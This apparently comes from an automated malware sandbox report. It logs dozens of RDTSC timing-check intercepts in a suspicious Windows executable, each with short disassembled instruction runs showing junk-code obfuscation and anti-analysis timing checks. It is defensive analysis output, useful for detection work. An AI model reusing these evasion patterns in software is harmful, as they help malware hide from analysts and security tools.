Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6DB47B second address: 6DB489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FED74F3E51Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6E888A second address: 6E88DD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 je 00007FED75508866h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007FED7550886Ah 0x00000014 popad 0x00000015 jmp 00007FED7550886Dh 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jnl 00007FED75508866h 0x00000024 jmp 00007FED75508877h 0x00000029 popad 0x0000002a jmp 00007FED7550886Ah 0x0000002f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6E8A34 second address: 6E8A40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FED74F3E516h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6E8A40 second address: 6E8A44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6E8A44 second address: 6E8A48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6E8A48 second address: 6E8A55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6E8A55 second address: 6E8AA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FED74F3E51Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007FED74F3E546h 0x00000011 jmp 00007FED74F3E528h 0x00000016 jmp 00007FED74F3E528h 0x0000001b push eax 0x0000001c push edx 0x0000001d jns 00007FED74F3E516h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6E8E45 second address: 6E8E4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FED75508866h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6E8F83 second address: 6E8F87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6E90DE second address: 6E90E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6E90E6 second address: 6E9102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FED74F3E523h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6E9102 second address: 6E9106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6E9106 second address: 6E910A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6EA224 second address: 6EA22A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6EA22A second address: 6EA234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FED74F3E516h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6BD391 second address: 6BD395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6F6E89 second address: 6F6E95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6F6E95 second address: 6F6EB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED75508872h 0x00000009 pop ecx 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6F7284 second address: 6F72B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 ja 00007FED74F3E52Ch 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007FED74F3E524h 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jo 00007FED74F3E516h 0x0000001c jne 00007FED74F3E516h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6F72B7 second address: 6F72CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007FED75508872h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6F76EE second address: 6F7708 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E522h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6F7708 second address: 6F7733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push ecx 0x00000008 jg 00007FED75508866h 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007FED75508866h 0x00000017 jmp 00007FED75508874h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6F7733 second address: 6F7737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6FAE3A second address: 6FAEC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FED75508868h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 jmp 00007FED7550886Eh 0x00000019 pushad 0x0000001a jmp 00007FED7550886Fh 0x0000001f jmp 00007FED7550886Bh 0x00000024 popad 0x00000025 popad 0x00000026 mov eax, dword ptr [eax] 0x00000028 pushad 0x00000029 jg 00007FED75508868h 0x0000002f pushad 0x00000030 popad 0x00000031 push ecx 0x00000032 jp 00007FED75508866h 0x00000038 pop ecx 0x00000039 popad 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e jmp 00007FED75508877h 0x00000043 pop eax 0x00000044 jmp 00007FED75508870h 0x00000049 push 4AB5381Bh 0x0000004e pushad 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6FB540 second address: 6FB575 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E528h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FED74F3E525h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6FBA00 second address: 6FBA15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6FC519 second address: 6FC51D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6FC51D second address: 6FC52B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6FC52B second address: 6FC530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6FE525 second address: 6FE52B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6FE52B second address: 6FE530 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 70152F second address: 7015C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 jnc 00007FED7550886Ch 0x0000000e pop esi 0x0000000f nop 0x00000010 jc 00007FED7550886Ch 0x00000016 or edi, 272462D9h 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push eax 0x00000021 call 00007FED75508868h 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b add dword ptr [esp+04h], 0000001Ch 0x00000033 inc eax 0x00000034 push eax 0x00000035 ret 0x00000036 pop eax 0x00000037 ret 0x00000038 add dword ptr [ebp+122D1B93h], ebx 0x0000003e mov edi, eax 0x00000040 mov si, cx 0x00000043 push 00000000h 0x00000045 push 00000000h 0x00000047 push ecx 0x00000048 call 00007FED75508868h 0x0000004d pop ecx 0x0000004e mov dword ptr [esp+04h], ecx 0x00000052 add dword ptr [esp+04h], 0000001Bh 0x0000005a inc ecx 0x0000005b push ecx 0x0000005c ret 0x0000005d pop ecx 0x0000005e ret 0x0000005f xchg eax, ebx 0x00000060 je 00007FED7550886Eh 0x00000066 jno 00007FED75508868h 0x0000006c push eax 0x0000006d pushad 0x0000006e jp 00007FED75508868h 0x00000074 push eax 0x00000075 push edx 0x00000076 push esi 0x00000077 pop esi 0x00000078 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7067E6 second address: 7067FD instructions: 0x00000000 rdtsc 0x00000002 jp 00007FED74F3E516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FED74F3E51Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7067FD second address: 706802 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 70775A second address: 707765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FED74F3E516h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 707765 second address: 7077C2 instructions: 0x00000000 rdtsc 0x00000002 je 00007FED75508868h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d stc 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007FED75508868h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a push 00000000h 0x0000002c mov ebx, dword ptr [ebp+122D17F3h] 0x00000032 xchg eax, esi 0x00000033 jbe 00007FED75508877h 0x00000039 push edx 0x0000003a jmp 00007FED7550886Fh 0x0000003f pop edx 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 jl 00007FED7550886Ch 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7077C2 second address: 7077C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 708766 second address: 70876B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7079B2 second address: 7079B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 70876B second address: 7087AD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FED75508868h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007FED75508868h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000014h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 mov bh, ah 0x00000027 add dword ptr [ebp+1247B672h], ebx 0x0000002d push 00000000h 0x0000002f stc 0x00000030 push 00000000h 0x00000032 sub dword ptr [ebp+122D2383h], edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push edx 0x0000003d pop edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 70965D second address: 709662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7088ED second address: 7088F3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 709662 second address: 709668 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7098A6 second address: 7098AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 70A83D second address: 70A8B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+122D1D2Ah], edx 0x00000014 push dword ptr fs:[00000000h] 0x0000001b xor ebx, dword ptr [ebp+122D36C8h] 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 mov dword ptr [ebp+122D1820h], eax 0x0000002e mov eax, dword ptr [ebp+122D052Dh] 0x00000034 push 00000000h 0x00000036 push edi 0x00000037 call 00007FED74F3E518h 0x0000003c pop edi 0x0000003d mov dword ptr [esp+04h], edi 0x00000041 add dword ptr [esp+04h], 0000001Dh 0x00000049 inc edi 0x0000004a push edi 0x0000004b ret 0x0000004c pop edi 0x0000004d ret 0x0000004e push FFFFFFFFh 0x00000050 nop 0x00000051 je 00007FED74F3E51Ch 0x00000057 pushad 0x00000058 push esi 0x00000059 pop esi 0x0000005a pushad 0x0000005b popad 0x0000005c popad 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007FED74F3E51Ch 0x00000065 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 70B7F3 second address: 70B7F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7105F7 second address: 7105FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7114CE second address: 7114D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 70F785 second address: 70F789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 71080E second address: 710812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7126C7 second address: 7126D1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FED74F3E51Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 713571 second address: 713582 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 710812 second address: 710818 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 70F847 second address: 70F85D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508872h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 713582 second address: 713589 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7127CE second address: 7127D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7136CC second address: 7136FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FED74F3E521h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FED74F3E528h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 716408 second address: 71640C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 71BF0D second address: 71BF13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 71BF13 second address: 71BF55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FED75508878h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FED75508877h 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push ebx 0x00000019 push eax 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 71BF55 second address: 71BF68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FED74F3E51Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 71BF68 second address: 71BF6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 71BF6E second address: 71BF74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 71BF74 second address: 71BF79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 71B6C8 second address: 71B6CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 71B6CE second address: 71B70C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FED75508866h 0x0000000a popad 0x0000000b jmp 00007FED75508870h 0x00000010 pushad 0x00000011 jno 00007FED75508866h 0x00000017 jmp 00007FED75508871h 0x0000001c jl 00007FED75508866h 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 71B70C second address: 71B710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 71B710 second address: 71B716 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 71B867 second address: 71B871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 71B871 second address: 71B882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jl 00007FED75508866h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 71B882 second address: 71B88C instructions: 0x00000000 rdtsc 0x00000002 jc 00007FED74F3E516h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 71B88C second address: 71B895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 72080A second address: 72082D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E525h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7208F9 second address: 720909 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 720909 second address: 54BAE0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FED74F3E518h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 12D87AABh 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FED74F3E518h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b stc 0x0000002c push dword ptr [ebp+122D0C21h] 0x00000032 jmp 00007FED74F3E51Ah 0x00000037 call dword ptr [ebp+122D244Ah] 0x0000003d pushad 0x0000003e sub dword ptr [ebp+122D1C6Ch], edi 0x00000044 xor eax, eax 0x00000046 mov dword ptr [ebp+122D1C6Ch], ecx 0x0000004c sub dword ptr [ebp+122D1C6Ch], esi 0x00000052 mov edx, dword ptr [esp+28h] 0x00000056 stc 0x00000057 mov dword ptr [ebp+122D36A8h], eax 0x0000005d jmp 00007FED74F3E521h 0x00000062 mov esi, 0000003Ch 0x00000067 stc 0x00000068 add esi, dword ptr [esp+24h] 0x0000006c mov dword ptr [ebp+122D1C56h], ecx 0x00000072 lodsw 0x00000074 ja 00007FED74F3E522h 0x0000007a add eax, dword ptr [esp+24h] 0x0000007e pushad 0x0000007f xor dword ptr [ebp+122D1990h], edi 0x00000085 or ebx, 4FB5547Ch 0x0000008b popad 0x0000008c mov ebx, dword ptr [esp+24h] 0x00000090 clc 0x00000091 push eax 0x00000092 js 00007FED74F3E524h 0x00000098 push eax 0x00000099 push edx 0x0000009a push eax 0x0000009b push edx 0x0000009c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 727940 second address: 727944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 727944 second address: 72795C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnp 00007FED74F3E516h 0x0000000f jne 00007FED74F3E516h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 726634 second address: 72664B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED75508873h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 727106 second address: 727111 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jne 00007FED74F3E516h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 727261 second address: 727267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
